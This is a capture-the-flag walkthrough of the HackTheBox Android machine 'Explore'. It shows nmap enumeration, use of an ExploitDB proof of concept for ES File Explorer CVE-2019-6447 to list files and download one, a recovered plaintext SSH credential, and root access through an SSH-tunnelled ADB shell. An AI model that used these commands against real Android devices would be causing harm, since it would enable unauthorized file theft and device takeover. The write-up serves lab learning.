HTB - Explore

This was classified as an easy box by bertolis on HackTheBox and my first experience with Android exploitation. Enumerating the opened ports, we discover a SSH, Android Debug Bridge (adb), and ES File Explorer, which is vulnerable to CVE-2019-6447 and will be our method to gain foothold. For privilege escalation, we will setup a SSH Tunnel to execute adb commands and gain root.

OS Difficulty IP Address Status
Android Easy Retired

Phase 1 - Enumeration


We first run a network scan to enumerate open ports.

2222/tcp open     ssh     (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey: 
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :

From the results above, we see that SSH is opened on port 2222 and it’s banner states that it’s “Banana Studio.” A quick Google search reveals that Banana Studio is a SSH Server for Android operating systems.

Since we are not sure whether the output of previous nmap command shows all open ports, we will also run a full port scan on the target with the following: sudo nmap -p-


2222/tcp  open     EtherNetIP-1
5555/tcp  filtered freeciv
42135/tcp open     unknown
45225/tcp open     unknown
59777/tcp open     unknown

Seeing that the four ports running were (2222, 5555, 42135, 45225, 59777) We did some research on common uses of those ports on Android operating systems. Information I found included:

  • 2222: SimpleSSH
  • 5555: Android Debug Bridge (ADB)
  • 59777: ES File Explorer

Phase 2 - Exploitation


Doing some research on each port, we find something on port 59777 which is for ES File Explorer, we find a vulnerability that allows remote attackers to read arbitrary files or execute applications via TCP port 59777 requests on the local network.

Looking in ExploitDB, we find a proof-of-concept Python exploit script for CVE-2019-6447

Running the Python script with the following commands shows us the listings on the directory: python3 listPics

OUTPUT: creds.jpg looks most intersting

Let’s download creds.jpg with the following command. python3 getFile /storage/emulated/0/DCIM/creds.jpg

And open the image. kristi:Kr1sT!5h@Rp3xPl0r3!

And we got some credentials, we will try to login with the SSH Server opened on the Android device with the following command: ssh [email protected] -p 2222

OUTPUT: enter image description here

And we get in, gaining our foothold! user.txt can be found in sdcard/user.txt

Phase 3 - Privilege Escalation

Port Forwarding

Since we have access to the device through SSH, and we know that there’s an ADB service running on port 5555; means we can execute commands with ADB. In order to run ADB commands on the device, we will have to set up SSH port forwarding with the following command:

ssh [email protected] -p 2222 -L 5555:localhost:5555

Android Debug Bridge (adb)

ADB commands help ⇐ Official documentation to adb commands.

We will run the following commands on the device, gain a shell, and escalate that shell to root.

# to establist a connection
adb connect

# to list connected devices
adb devices

# to connect to specified device with interactive shell
adb -s shell

enter image description here

And we are root! root.txt can be found in /data/root.txt